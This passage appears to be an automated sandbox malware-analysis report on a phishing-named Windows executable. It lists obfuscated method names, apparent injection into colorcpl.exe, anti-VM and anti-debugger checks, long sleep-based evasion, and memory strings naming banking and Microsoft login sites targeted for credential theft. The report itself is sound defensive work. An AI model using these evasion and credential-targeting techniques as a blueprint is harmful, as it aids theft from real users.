Source: 0.2.NF_Payment_Ref_FAN930276.exe.b360000.4.raw.unpack, dE7ePfsB4iKPS7munM.cs	High entropy of concatenated method names: 'wwKf5iwhU', 'C9MrSnwkH', 'JCQO2C6xg', 'KFhEQX1bJ', 'jsvsKRREJ', 'e0XZM5UOC', 'bqrpkOqdA9NPOyu0Zx', 'OxwajmE31Dc0CogEoP', 'GDS9g4Pbl', 'RMWqXC6cG'
Source: 0.2.NF_Payment_Ref_FAN930276.exe.b360000.4.raw.unpack, EFMsT9GY7t3Gmy7OvK.cs	High entropy of concatenated method names: 'iOakphwhpV', 'yTfkhryS9l', 'HH4kmqirj3', 'abWmL4HM0S', 'xubmz3KlR3', 'YGkkMWRqLt', 'zrskKms92t', 'Vjxk4VUA76', 'L2Ukw7JG4T', 'RcvkVews7a'
Source: 0.2.NF_Payment_Ref_FAN930276.exe.b360000.4.raw.unpack, bUcSe8D1xH3PFuCDlv.cs	High entropy of concatenated method names: 'ChYhrCXmEg', 'DjlhO3nTfh', 'SGQhFZ64NV', 'HiZhsiIbcD', 'NEDhDvFFTd', 'aGuhlID65S', 'JR3hTW3Dm4', 'Qr3h9yGUAL', 'aLwh5JRsol', 'wE1hqEUQQv'
Source: 0.2.NF_Payment_Ref_FAN930276.exe.b360000.4.raw.unpack, clPqp4phOdkKvqr3gS.cs	High entropy of concatenated method names: 'MUo9pyLo1s', 'KKd9Nncf2N', 'CIa9hnTjDQ', 'V079yI7iKB', 'gfs9mPOgub', 'fiy9k2y9Lv', 'EId9jyEQBt', 'Y1K9vJ8rD3', 'eZh9YrcL5V', 'WeP9UC8oLB'
Source: 0.2.NF_Payment_Ref_FAN930276.exe.b360000.4.raw.unpack, VKBmrI3WAxwWAfZXaC.cs	High entropy of concatenated method names: 'eVAkJ0lQ73', 'J01k0goAkg', 'CgUkfOQKF3', 'WSIkrXRRbv', 'I6gkoEmlJd', 'k3NkOVvJbO', 'jB7kEl2j7c', 'Fw5kF4RBxv', 'lMkksOeJuJ', 'wt8kZpLZmD'
Source: 0.2.NF_Payment_Ref_FAN930276.exe.4354410.2.raw.unpack, sueo5UdIx8bBgI6PCF.cs	High entropy of concatenated method names: 'GFTwaZigPV', 'C4cwpsXlBc', 'Q6AwNWEGMW', 'Sm6whAHkT6', 'p4uwyvyoFQ', 'tOTwmaDo1o', 'rqFwkfYmbY', 'G09wjqk8bC', 'L7ywvCdadn', 'aKjwYxJd0L'
Source: 0.2.NF_Payment_Ref_FAN930276.exe.4354410.2.raw.unpack, Sli4DW9alcwqplWEds.cs	High entropy of concatenated method names: 'UVQNuyxNjI', 'wPuN1qgXTO', 'cdCNeDQJQC', 'XuvNS7KTCB', 'Bd6NdUXhTq', 'RMANXoTRwJ', 'W65NbLWHMs', 'r7NN8yMcnw', 'hDiNRJQJxJ', 'Hn0NLkNKO3'
Source: 0.2.NF_Payment_Ref_FAN930276.exe.4354410.2.raw.unpack, eXBqexgXnhhTHnt4KX3.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'LLhquFB5T1', 'uwTq16FqRx', 'C6xqeituaK', 'pQyqSeArIh', 'gM8qdy2cFa', 'kAnqXLYA09', 'IXvqbE26lT'
Source: 0.2.NF_Payment_Ref_FAN930276.exe.4354410.2.raw.unpack, I9sXMhjL9pxDQdeilY.cs	High entropy of concatenated method names: 'cuD9GM1YrR', 'bGZ9cFf7Rj', 'Cme92IxCON', 'fHh9CCVbm5', 'i5R9uEBnCK', 'OC993udlMm', 'Next', 'Next', 'Next', 'NextBytes'
Source: 0.2.NF_Payment_Ref_FAN930276.exe.4354410.2.raw.unpack, wnukAYgggxIiSaIyoK4.cs	High entropy of concatenated method names: 'ToString', 'CNXqwT8t0v', 'oxLqVaW9BW', 'KoSqaX5OMw', 'fT8qpJLoA3', 'xI1qNkKd0N', 'ReOqhlfIgP', 'nnMqyS9iB9', 'AvQSUe0AHYrOQLyI2D1', 'u5wVRp0XSn3tZSaGZ9M'
Source: 0.2.NF_Payment_Ref_FAN930276.exe.4354410.2.raw.unpack, Jmn7TDkTQyO5p2V4pF.cs	High entropy of concatenated method names: 'I9vTYg6tha', 'FVSTUp1RFM', 'ToString', 'GpXTpUqCQE', 'j6STNBLk2w', 'cuAThgeprx', 'KA7TykTL1r', 'qN2TmtWhIZ', 'iCXTkaghJk', 'K9GTjG9EsL'
Source: 0.2.NF_Payment_Ref_FAN930276.exe.4354410.2.raw.unpack, TYweWABd4gnA6BiO6U.cs	High entropy of concatenated method names: 'laH5Km8Owc', 'HUS5wSHuvN', 'RHl5VtUuhQ', 'Qlo5pk98BF', 'GBi5NjnHEn', 'g4S5ytHJ2a', 'NgY5mK2DYx', 'feQ9bNlbvp', 'B2I98Hdc7Y', 'JQk9RDxgJZ'
Source: 0.2.NF_Payment_Ref_FAN930276.exe.4354410.2.raw.unpack, uBsWR1whKavSGYEwL9.cs	High entropy of concatenated method names: 'fgTKk0gpJ8', 'QZuKjHlvt7', 'C5jKYYrajn', 'BFVKUc86pP', 'geEKDbG7FW', 'YJCKlohSvD', 'jp9LLxXZQ6CyGQcXf1', 'hpjsrk2dRXBbcFstqo', 'v4pKKsg7RM', 'ni3KwDoNC1'
Source: 0.2.NF_Payment_Ref_FAN930276.exe.4354410.2.raw.unpack, TrwYxKFrGt1NX10rm7.cs	High entropy of concatenated method names: 'LLCPFYxF12', 'ba4Ps6E117', 'xHlPGDOiLR', 'S9DPc9pjH9', 'jxaPC1wDBC', 'jn1P3PmVS0', 'zNePguQTef', 't4TPBur7QC', 'k3rPxY23dc', 'b5xPIE3LEc'
Source: 0.2.NF_Payment_Ref_FAN930276.exe.4354410.2.raw.unpack, pLjukBgffZRmJjBJSJV.cs	High entropy of concatenated method names: 'MNX5JgPL8H', 'tdD50oWUlY', 't5v5fHJNhi', 'eGa5rwZfP3', 'cp85ooibxX', 'A9k5OMnfeh', 'dUb5EM6wfc', 'vZv5F2sX5w', 'SR55soR9Dx', 'XVN5ZRcwdB'
Source: 0.2.NF_Payment_Ref_FAN930276.exe.4354410.2.raw.unpack, hxCJeMU4eehAikm1DM.cs	High entropy of concatenated method names: 'c18T8Fp8a1', 'H24TLViI8U', 'U8k9MYN3K2', 'os99KskAlM', 'QwgTIYlFjO', 'P6DTn4EWy0', 'N6QTAMgngj', 'GErTuwOTFq', 'rksT1ZN2aI', 'JBpTeaxeNQ'
Source: 0.2.NF_Payment_Ref_FAN930276.exe.4354410.2.raw.unpack, kn5CeNcnQ21Ob3V9bn.cs	High entropy of concatenated method names: 'Dispose', 'MxNKRYpotl', 'RRK4crH536', 'AKOQQcAwGb', 'twLKLZgDKa', 'GZyKzUFYAN', 'ProcessDialogKey', 'S7R4MgSkx3', 'tcc4KFg4Rd', 'KYP449exNb'
Source: 0.2.NF_Payment_Ref_FAN930276.exe.4354410.2.raw.unpack, Djnu7ArL3JPPZ5TZFW.cs	High entropy of concatenated method names: 'sjaDx6tudr', 'TcaDnCqWsy', 'ixTDuB4yED', 'jUuD1R71OV', 'RntDccpvBb', 'ALID2BpZtC', 'eG2DCtK9IP', 'A5UD3KaFtc', 'TbIDWIYJwd', 'NhUDgRwBtn'
Source: 0.2.NF_Payment_Ref_FAN930276.exe.4354410.2.raw.unpack, fDB32RxexiDY4YPFvf.cs	High entropy of concatenated method names: 'z0NmaUluQ6', 'QhHmNqL8H4', 'FOpmy02dMe', 'R8qmkjJbkl', 'My5mjIH28E', 'iWRyd6DtfD', 'sqcyXV6ifd', 'mSPybcnqyp', 'WxPy8FqUDy', 'gjCyRxOssV'
Source: 0.2.NF_Payment_Ref_FAN930276.exe.4354410.2.raw.unpack, OlTiSOAJNSJSWNWDAr.cs	High entropy of concatenated method names: 'ToString', 'l0ElIhksOd', 'nfglcmiWVy', 'fAZl27XPAH', 'JSnlCKeiNT', 'uVel3kKT9x', 'B32lW52drB', 'VXqlgnbgKZ', 'HtVlB4kTAn', 'p6GlHCWe6m'
Source: 0.2.NF_Payment_Ref_FAN930276.exe.4354410.2.raw.unpack, aOPj9RJ6D3mMysj82S.cs	High entropy of concatenated method names: 'rh8yohiCYq', 'wWpyEl9ADq', 'wjvh2mOLuj', 'htGhCnViLy', 'XpIh3tT2Yb', 'u1uhWv8B8M', 'uhEhgbLjdg', 'tMwhBGetYr', 'HvxhHMwfiX', 'cwghxvCcn5'
Source: 0.2.NF_Payment_Ref_FAN930276.exe.4354410.2.raw.unpack, dE7ePfsB4iKPS7munM.cs	High entropy of concatenated method names: 'wwKf5iwhU', 'C9MrSnwkH', 'JCQO2C6xg', 'KFhEQX1bJ', 'jsvsKRREJ', 'e0XZM5UOC', 'bqrpkOqdA9NPOyu0Zx', 'OxwajmE31Dc0CogEoP', 'GDS9g4Pbl', 'RMWqXC6cG'
Source: 0.2.NF_Payment_Ref_FAN930276.exe.4354410.2.raw.unpack, EFMsT9GY7t3Gmy7OvK.cs	High entropy of concatenated method names: 'iOakphwhpV', 'yTfkhryS9l', 'HH4kmqirj3', 'abWmL4HM0S', 'xubmz3KlR3', 'YGkkMWRqLt', 'zrskKms92t', 'Vjxk4VUA76', 'L2Ukw7JG4T', 'RcvkVews7a'
Source: 0.2.NF_Payment_Ref_FAN930276.exe.4354410.2.raw.unpack, bUcSe8D1xH3PFuCDlv.cs	High entropy of concatenated method names: 'ChYhrCXmEg', 'DjlhO3nTfh', 'SGQhFZ64NV', 'HiZhsiIbcD', 'NEDhDvFFTd', 'aGuhlID65S', 'JR3hTW3Dm4', 'Qr3h9yGUAL', 'aLwh5JRsol', 'wE1hqEUQQv'
Source: 0.2.NF_Payment_Ref_FAN930276.exe.4354410.2.raw.unpack, clPqp4phOdkKvqr3gS.cs	High entropy of concatenated method names: 'MUo9pyLo1s', 'KKd9Nncf2N', 'CIa9hnTjDQ', 'V079yI7iKB', 'gfs9mPOgub', 'fiy9k2y9Lv', 'EId9jyEQBt', 'Y1K9vJ8rD3', 'eZh9YrcL5V', 'WeP9UC8oLB'
Source: 0.2.NF_Payment_Ref_FAN930276.exe.4354410.2.raw.unpack, VKBmrI3WAxwWAfZXaC.cs	High entropy of concatenated method names: 'eVAkJ0lQ73', 'J01k0goAkg', 'CgUkfOQKF3', 'WSIkrXRRbv', 'I6gkoEmlJd', 'k3NkOVvJbO', 'jB7kEl2j7c', 'Fw5kF4RBxv', 'lMkksOeJuJ', 'wt8kZpLZmD'

Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Yara detected AntiVM3

Source: Yara match

File source: Process Memory Space: NF_Payment_Ref_FAN930276.exe PID: 4712, type: MEMORYSTR

Switches to a custom stack to bypass stack traces

Source: C:\Windows\SysWOW64\colorcpl.exe	API/Special instruction interceptor: Address: 7FF8C88ED324
Source: C:\Windows\SysWOW64\colorcpl.exe	API/Special instruction interceptor: Address: 7FF8C88ED7E4
Source: C:\Windows\SysWOW64\colorcpl.exe	API/Special instruction interceptor: Address: 7FF8C88ED944
Source: C:\Windows\SysWOW64\colorcpl.exe	API/Special instruction interceptor: Address: 7FF8C88ED504
Source: C:\Windows\SysWOW64\colorcpl.exe	API/Special instruction interceptor: Address: 7FF8C88ED544
Source: C:\Windows\SysWOW64\colorcpl.exe	API/Special instruction interceptor: Address: 7FF8C88ED1E4
Source: C:\Windows\SysWOW64\colorcpl.exe	API/Special instruction interceptor: Address: 7FF8C88F0154
Source: C:\Windows\SysWOW64\colorcpl.exe	API/Special instruction interceptor: Address: 7FF8C88EDA44

Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Memory allocated: 2780000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Memory allocated: 2800000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Memory allocated: 4800000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Memory allocated: 8920000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Memory allocated: 9920000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Memory allocated: 9B20000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Memory allocated: AB20000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Memory allocated: B3F0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Memory allocated: C3F0000 memory reserve \| memory write watch	Jump to behavior

Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe

Code function: 4_2_01B0096E rdtsc

4_2_01B0096E

Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

Source: C:\Windows\SysWOW64\colorcpl.exe	Window / User API: threadDelayed 5640			Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe	Window / User API: threadDelayed 4332			Jump to behavior

Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	API coverage: 0.7 %
Source: C:\Windows\SysWOW64\colorcpl.exe	API coverage: 2.6 %

Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe TID: 6716	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe TID: 2072	Thread sleep count: 5640 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe TID: 2072	Thread sleep time: -11280000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe TID: 2072	Thread sleep count: 4332 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe TID: 2072	Thread sleep time: -8664000s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\eROVoFobOWKuBHetsTIgsKlDQIveGpUTdpiHQSbYAGLQaaUshtCAvQAnzb\xIrbjTuvDXL.exe TID: 572	Thread sleep time: -85000s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\eROVoFobOWKuBHetsTIgsKlDQIveGpUTdpiHQSbYAGLQaaUshtCAvQAnzb\xIrbjTuvDXL.exe TID: 572	Thread sleep count: 41 > 30	Jump to behavior
Source: C:\Program Files (x86)\eROVoFobOWKuBHetsTIgsKlDQIveGpUTdpiHQSbYAGLQaaUshtCAvQAnzb\xIrbjTuvDXL.exe TID: 572	Thread sleep time: -61500s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\eROVoFobOWKuBHetsTIgsKlDQIveGpUTdpiHQSbYAGLQaaUshtCAvQAnzb\xIrbjTuvDXL.exe TID: 572	Thread sleep count: 42 > 30	Jump to behavior
Source: C:\Program Files (x86)\eROVoFobOWKuBHetsTIgsKlDQIveGpUTdpiHQSbYAGLQaaUshtCAvQAnzb\xIrbjTuvDXL.exe TID: 572	Thread sleep time: -42000s >= -30000s	Jump to behavior

Source: C:\Windows\SysWOW64\colorcpl.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\colorcpl.exe	Last function: Thread delayed

Source: C:\Windows\SysWOW64\colorcpl.exe

Code function: 7_2_0305C3B0 FindFirstFileW,FindNextFileW,FindClose,

7_2_0305C3B0

Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

Source: Ea64OHKq.7.dr	Binary or memory string: Canara Transaction PasswordVMware20,11696428655x
Source: Ea64OHKq.7.dr	Binary or memory string: discord.comVMware20,11696428655f
Source: Ea64OHKq.7.dr	Binary or memory string: interactivebrokers.co.inVMware20,11696428655d
Source: Ea64OHKq.7.dr	Binary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
Source: Ea64OHKq.7.dr	Binary or memory string: global block list test formVMware20,11696428655
Source: Ea64OHKq.7.dr	Binary or memory string: Canara Transaction PasswordVMware20,11696428655}
Source: Ea64OHKq.7.dr	Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
Source: Ea64OHKq.7.dr	Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
Source: Ea64OHKq.7.dr	Binary or memory string: account.microsoft.com/profileVMware20,11696428655u
Source: Ea64OHKq.7.dr	Binary or memory string: secure.bankofamerica.comVMware20,11696428655\|UE
Source: Ea64OHKq.7.dr	Binary or memory string: www.interactivebrokers.comVMware20,11696428655}
Source: Ea64OHKq.7.dr	Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
Source: Ea64OHKq.7.dr	Binary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
Source: Ea64OHKq.7.dr	Binary or memory string: outlook.office365.comVMware20,11696428655t
Source: Ea64OHKq.7.dr	Binary or memory string: microsoft.visualstudio.comVMware20,11696428655x
Source: colorcpl.exe, 00000007.00000002.4486968651.00000000037DD000.00000004.00000020.00020000.00000000.sdmp, xIrbjTuvDXL.exe, 00000008.00000002.4487294188.000000000124F000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000009.00000002.2559413379.0000029EB392C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: Ea64OHKq.7.dr	Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655
Source: Ea64OHKq.7.dr	Binary or memory string: outlook.office.comVMware20,11696428655s
Source: Ea64OHKq.7.dr	Binary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
Source: Ea64OHKq.7.dr	Binary or memory string: ms.portal.azure.comVMware20,11696428655
Source: Ea64OHKq.7.dr	Binary or memory string: AMC password management pageVMware20,11696428655
Source: Ea64OHKq.7.dr	Binary or memory string: tasks.office.comVMware20,11696428655o
Source: Ea64OHKq.7.dr	Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
Source: Ea64OHKq.7.dr	Binary or memory string: turbotax.intuit.comVMware20,11696428655t
Source: Ea64OHKq.7.dr	Binary or memory string: interactivebrokers.comVMware20,11696428655
Source: Ea64OHKq.7.dr	Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
Source: Ea64OHKq.7.dr	Binary or memory string: dev.azure.comVMware20,11696428655j
Source: Ea64OHKq.7.dr	Binary or memory string: netportal.hdfcbank.comVMware20,11696428655
Source: Ea64OHKq.7.dr	Binary or memory string: Interactive Brokers - HKVMware20,11696428655]
Source: Ea64OHKq.7.dr	Binary or memory string: bankofamerica.comVMware20,11696428655x
Source: Ea64OHKq.7.dr	Binary or memory string: trackpan.utiitsl.comVMware20,11696428655h
Source: Ea64OHKq.7.dr	Binary or memory string: Test URL for global passwords blocklistVMware20,11696428655

Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe	Process queried: DebugPort			Jump to behavior

Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe

Code function: 4_2_01B0096E rdtsc

4_2_01B0096E

Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe

Code function: 4_2_00417563 LdrLoadDll,

4_2_00417563

Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01B4019F mov eax, dword ptr fs:[00000030h]	4_2_01B4019F
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01B4019F mov eax, dword ptr fs:[00000030h]	4_2_01B4019F
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01B4019F mov eax, dword ptr fs:[00000030h]	4_2_01B4019F
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01B4019F mov eax, dword ptr fs:[00000030h]	4_2_01B4019F
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01B00185 mov eax, dword ptr fs:[00000030h]	4_2_01B00185
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01B64180 mov eax, dword ptr fs:[00000030h]	4_2_01B64180
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01B64180 mov eax, dword ptr fs:[00000030h]	4_2_01B64180
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01ABA197 mov eax, dword ptr fs:[00000030h]	4_2_01ABA197
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01ABA197 mov eax, dword ptr fs:[00000030h]	4_2_01ABA197
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01ABA197 mov eax, dword ptr fs:[00000030h]	4_2_01ABA197
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01B7C188 mov eax, dword ptr fs:[00000030h]	4_2_01B7C188
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01B7C188 mov eax, dword ptr fs:[00000030h]	4_2_01B7C188
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01AF01F8 mov eax, dword ptr fs:[00000030h]	4_2_01AF01F8
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01B961E5 mov eax, dword ptr fs:[00000030h]	4_2_01B961E5
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01B3E1D0 mov eax, dword ptr fs:[00000030h]	4_2_01B3E1D0
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01B3E1D0 mov eax, dword ptr fs:[00000030h]	4_2_01B3E1D0
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01B3E1D0 mov ecx, dword ptr fs:[00000030h]	4_2_01B3E1D0
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01B3E1D0 mov eax, dword ptr fs:[00000030h]	4_2_01B3E1D0
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01B3E1D0 mov eax, dword ptr fs:[00000030h]	4_2_01B3E1D0
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01B861C3 mov eax, dword ptr fs:[00000030h]	4_2_01B861C3
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01B861C3 mov eax, dword ptr fs:[00000030h]	4_2_01B861C3
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01AF0124 mov eax, dword ptr fs:[00000030h]	4_2_01AF0124
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01B80115 mov eax, dword ptr fs:[00000030h]	4_2_01B80115
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01B6A118 mov ecx, dword ptr fs:[00000030h]	4_2_01B6A118
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01B6A118 mov eax, dword ptr fs:[00000030h]	4_2_01B6A118
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01B6A118 mov eax, dword ptr fs:[00000030h]	4_2_01B6A118
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01B6A118 mov eax, dword ptr fs:[00000030h]	4_2_01B6A118
